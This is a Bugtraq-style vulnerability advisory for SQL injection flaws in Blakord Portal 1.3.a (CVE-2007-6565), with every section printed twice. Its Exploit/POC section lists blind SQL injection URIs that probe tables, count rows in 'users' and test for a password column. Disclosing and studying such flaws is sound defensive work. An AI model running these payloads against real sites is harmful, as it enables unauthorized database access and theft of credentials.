Blakord Portal Multiple SQL Injection Vulnerabilities
BID:27038
Info
Blakord Portal Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27038 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6565 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | JosS is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Blakord Portal Blakord Portal 1.3.a |
| Not Vulnerable: | |
Discussion
Blakord Portal Multiple SQL Injection Vulnerabilities
Blakord Portal is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Blakord Portal 1.3.a and prior versions.
Blakord Portal is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Blakord Portal 1.3.a and prior versions.
Exploit / POC
Blakord Portal Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from [TABLE])
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from users)
http://www.example.com/[path]/[any module]?id=1 and 1=1
http://www.example.com/[path]/[any module]?id=1 and 1=2
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from [TABLE])
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from users)
http://www.example.com/[path]/[any module]?id=1 and 1=1
http://www.example.com/[path]/[any module]?id=1 and 1=2
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
Solution / Fix
Blakord Portal Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].